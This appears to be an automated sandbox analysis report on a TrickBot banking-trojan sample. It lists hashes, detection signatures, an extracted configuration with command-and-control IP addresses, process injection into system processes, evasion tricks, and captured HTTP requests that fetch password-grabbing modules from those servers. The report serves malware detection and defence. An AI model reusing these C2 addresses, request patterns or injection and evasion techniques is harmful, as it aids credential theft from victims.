Windows Analysis Report dngqoAXyDd.exe

Overview

General Information

Sample Name: dngqoAXyDd.exe
Analysis ID: 516930
MD5: 0afbb383c5cea9f11202d572141bb0f4
SHA1: 148266112b25087f10ac1124ea32630e48fb0bd9
SHA256: 6a910ec8055b3844e3dd14c7af08a68110abc9395a88ab9199e69ed07be27210

Detection

TrickBot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Multi AV Scanner detection for submitted file
Found detection on Joe Sandbox Cloud Basic with higher score
Sigma detected: Suspect Svchost Activity
Writes to foreign memory regions
Hijacks the control flow in another process
May check the online IP address of the machine
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Sigma detected: Suspicious Svchost Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp Malware Configuration Extractor: Trickbot {"ver": "100019", "gtag": "top147", "servs": ["65.152.201.203:443", "185.56.175.122:443", "46.99.175.217:443", "179.189.229.254:443", "46.99.175.149:443", "181.129.167.82:443", "216.166.148.187:443", "46.99.188.223:443", "128.201.76.252:443", "62.99.79.77:443", "60.51.47.65:443", "24.162.214.166:443", "45.36.99.184:443", "97.83.40.67:443", "184.74.99.214:443", "103.105.254.17:443", "62.99.76.213:443", "82.159.149.52:443"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAABbfmkJRvwyw7iFkX40hL2HwsUeOSZZZo0FRRWGkY6J1+gf3YKq13Ee4sY3Jb9/0myCr0MwzNK1K2l5yuY87nW29Q/yjMJG0ISDj0HNBC3G+ZGta6Oi9QkjCwnNGbw2hQ4="}
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for submitted file
Source: dngqoAXyDd.exe Virustotal: Detection: 27%
Source: dngqoAXyDd.exe ReversingLabs: Detection: 28%

Compliance:

Uses 32bit PE files
Source: dngqoAXyDd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2
Source: dngqoAXyDd.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\sample exe lego\correctmodel.pdb source: dngqoAXyDd.exe
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD0960 FindFirstFileW,FindNextFileW, 3_2_000001767ECD0960
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC7120 FindFirstFileW,FindNextFileW, 3_2_000001767ECC7120

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECCFA20
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECD3990
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 3_2_000001767ECC4D50
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECCB520
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECC0A00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec ecx 3_2_000001767ECCFBA0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECCFBA0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then cmp dword ptr [eax], ecx 3_2_000001767ECBA3B0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov byte ptr [esp+ecx+70h], cl 3_2_000001767ECD5F60
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECBE320
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECD5EC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 3_2_000001767ECB6EF0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECC4060
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 3_2_000001767ECC9460
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECB4470
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ebx, edx 3_2_000001767ECB4470
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 3_2_000001767ECB2BC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ebp 3_2_000001767ECB5BE0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ecx, byte ptr [ebp-07h] 3_2_000001767ECCE3F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.11.20:49778 -> 46.99.175.217:443
Source: Traffic Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.11.20:49809 -> 103.75.32.173:443
May check the online IP address of the machine
Source: unknown DNS query: name: ip.anysrc.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IPKO-ASAL
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 72a589da586844d7f0818ce684948eea
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 46.99.175.217
Source: Joe Sandbox View IP Address: 116.203.16.95
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Sat, 06 Nov 2021 14:12:52 GMT Content-Length: 9 Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Sat, 06 Nov 2021 14:14:12 GMT Content-Length: 9 Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 46.99.175.217
Source: Cookies.bak.13.dr String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.bak.13.dr String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: Cookies.bak.13.dr String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=bios320.exe
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=firefox
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=java
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=testzentrum
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releaseDownload
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/Download
Source: History.bak.13.dr String found in binary or memory: https://www.office.com/setup
Source: History.bak.13.dr String found in binary or memory: https://www.office.com/setupMicrosoft
Source: unknown HTTP traffic detected: POST /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS// HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=------Boundary00F7D7B1User-Agent: curl/7.77.0Content-Length: 141Host: 46.99.175.217
Source: unknown DNS traffic detected: queries for: ip.anysrc.net
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/file/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/0/Windows%2010%20x64/1108/102.129.143.91/6760749C3E0F3C8028653796E6C431FC062A0AA0107C34B734353BDE5C7824FB/K4eaS6gi8qoueakyUIyY/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/user/user/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5CGNU-Rach-559H%5CdngqoAXyDd.exe/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/23/100019/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/DNSBL/listed/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9
Source: global traffic HTTP traffic detected: GET /cookiechecker?uri=/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
Source: global traffic HTTP traffic detected: GET /index.html HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
Source: global traffic HTTP traffic detected: GET /login.cgi?uri=/index.html HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 202.58.199.82
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 202.58.199.82
Source: global traffic HTTP traffic detected: GET /plain HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: ip.anysrc.net
Source: unknown HTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2

E-Banking Fraud:

Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Found detection on Joe Sandbox Cloud Basic with higher score
Source: dngqoAXyDd.exe Joe Sandbox Cloud Basic: Detection: malicious Score: 80 Threat Name: TrickBot
Uses 32bit PE files
Source: dngqoAXyDd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: String function: 007443E0 appears 58 times
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: String function: 007475F5 appears 33 times
Contains functionality to call native functions
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCC550 NtDelayExecution, 3_2_000001767ECCC550
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC9CD0 NtQueryInformationProcess, 3_2_000001767ECC9CD0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBC750 NtQuerySystemInformation,DuplicateHandle,FindCloseChangeNotification,RtlDeleteBoundaryDescriptor, 3_2_000001767ECBC750
Sample file is different than original file name gathered from version info
Source: dngqoAXyDd.exe, 00000001.00000000.9203744354.00000000007C0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe
Source: dngqoAXyDd.exe Binary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe
PE file contains strange resources
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: edgegdi.dll
Source: dngqoAXyDd.exe Virustotal: Detection: 27%
Source: dngqoAXyDd.exe ReversingLabs: Detection: 28%
Source: dngqoAXyDd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\dngqoAXyDd.exe "C:\Users\user\Desktop\dngqoAXyDd.exe"
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\GNU-Rach-559H\cmdrun.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBF3C0 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification, 3_2_000001767ECBF3C0
Source: C:\Windows\System32\wermgr.exe System information queried: HandleInformation
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/5@4/4
Source: C:\Windows\System32\wermgr.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8652:304:WilStaging_02
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{73479EF1-E3D1-FEE2-97E2-B681E81CDF69}
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00731E80 GetDC,KiUserCallbackDispatcher,GetSystemMetrics,FindResourceA,FindResourceA,FindResourceA,FindResourceA,FindResourceA,VirtualAlloc,SizeofResource,LoadResource,SHGetFolderPathA, 1_2_00731E80
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: dngqoAXyDd.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\sample exe lego\correctmodel.pdb source: dngqoAXyDd.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0073D0DF push ecx; ret 1_2_0073D0F2
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00740093 pushad ; ret 1_2_00740094
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00744425 push ecx; ret 1_2_00744438
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074CEE1 push 510074C7h; retf 1_2_0074CEEF
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_028A0390 push dword ptr [edx+14h]; ret 1_2_028A049D
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD6DD0 pushad ; retf 3_2_000001767ECD6DD1
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCDF22 push esp; iretd 3_2_000001767ECCDF25
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074DD3C DecodePointer,LoadLibraryW,GetProcAddress,GetLastError,GetLastError,GetLastError,EncodePointer,InterlockedExchange,FreeLibrary, 1_2_0074DD3C
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\System32\wermgr.exe Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,languageOrLocalQueried,languageOrLocalQueried,adjustToken,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,threadInformationSet,threadInformationSet,threadDelayed,threadDelayed,systemQueried,systemQueried,fileOpened,fileOpened,fileOtherOp
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\dngqoAXyDd.exe TID: 8996 Thread sleep count: 140 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\wermgr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCADA0 rdtsc 3_2_000001767ECCADA0
Contains functionality to query network adapter information
Source: C:\Windows\System32\wermgr.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 3_2_000001767ECCFA20
Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD0960 FindFirstFileW,FindNextFileW, 3_2_000001767ECD0960
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC7120 FindFirstFileW,FindNextFileW, 3_2_000001767ECC7120
Source: wermgr.exe, 00000003.00000002.14257536634.000001767EDC0000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074293C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0074293C
Enables debug privileges
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCA280 LdrLoadDll, 3_2_000001767ECCA280
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074676A SetUnhandledExceptionFilter, 1_2_0074676A
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0073CFF8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0073CFF8

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: C:\Windows\System32\wermgr.exe base: 1767ECB0000
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: C:\Windows\System32\wermgr.exe base: 7FF756886500
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFB0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF67BDD4E80
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 199302D0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 (3 identical entries)
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 199302D0000
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 180001000 (2 identical entries)
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 18009D000 (2 identical entries)
